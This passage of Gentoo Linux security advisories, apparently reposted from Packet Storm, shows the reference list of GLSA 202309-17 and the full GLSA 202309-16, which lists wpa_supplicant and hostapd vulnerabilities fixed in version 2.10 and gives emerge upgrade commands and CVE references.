      https://nvd.nist.gov/vuln/detail/CVE-2023-2466  
[ 54 ] CVE-2023-2467  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2467  
[ 55 ] CVE-2023-2468  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2468  
[ 56 ] CVE-2023-2721  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2721  
[ 57 ] CVE-2023-2722  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2722  
[ 58 ] CVE-2023-2723  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2723  
[ 59 ] CVE-2023-2724  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2724  
[ 60 ] CVE-2023-2725  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2725  
[ 61 ] CVE-2023-2726  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2726  
[ 62 ] CVE-2023-21720  
      https://nvd.nist.gov/vuln/detail/CVE-2023-21720  
[ 63 ] CVE-2023-21794  
      https://nvd.nist.gov/vuln/detail/CVE-2023-21794  
[ 64 ] CVE-2023-23374  
      https://nvd.nist.gov/vuln/detail/CVE-2023-23374  
[ 65 ] CVE-2023-28261  
      https://nvd.nist.gov/vuln/detail/CVE-2023-28261  
[ 66 ] CVE-2023-28286  
      https://nvd.nist.gov/vuln/detail/CVE-2023-28286  
[ 67 ] CVE-2023-29334  
      https://nvd.nist.gov/vuln/detail/CVE-2023-29334  
[ 68 ] CVE-2023-29350  
      https://nvd.nist.gov/vuln/detail/CVE-2023-29350  
[ 69 ] CVE-2023-29354  
      https://nvd.nist.gov/vuln/detail/CVE-2023-29354

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202309-17

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202309-17

Gentoo Linux Security Advisory 202309-16 - Multiple vulnerabilities have been discovered in wpa_supplicant and hostapd, the worst of which could result in arbitrary code execution. Versions greater than or equal to 2.10 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202309-16  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: wpa_supplicant, hostapd: Multiple Vulnerabilities  
     Date: September 30, 2023  
     Bugs: #768759, #780135, #780138, #831332  
       ID: 202309-16

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in wpa_supplicant and  
hostapd, the worst of which could result in arbitrary code execution.

Background  
==========

wpa_supplicant is a WPA Supplicant with support for WPA and WPA2 (IEEE  
802.11i / RSN). hostapd is a user space daemon for access point and  
authentication servers.

Affected packages  
=================

Package                      Vulnerable    Unaffected  
---------------------------  ------------  ------------  
net-wireless/hostapd         < 2.10        >= 2.10  
net-wireless/wpa_supplicant  < 2.10        >= 2.10

Description  
===========

Multiple vulnerabilities have been discovered in hostapd and  
wpa_supplicant. Please review the CVE identifiers referenced below for  
details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All wpa_supplicant users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-wireless/wpa_supplicant-2.10"

All hostapd users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-wireless/hostapd-2.10"

References  
==========

[ 1 ] CVE-2021-30004  
      https://nvd.nist.gov/vuln/detail/CVE-2021-30004  
[ 2 ] CVE-2022-23303  
      https://nvd.nist.gov/vuln/detail/CVE-2022-23303  
[ 3 ] CVE-2022-23304  
      https://nvd.nist.gov/vuln/detail/CVE-2022-23304

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202309-16

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Source

Packet Storm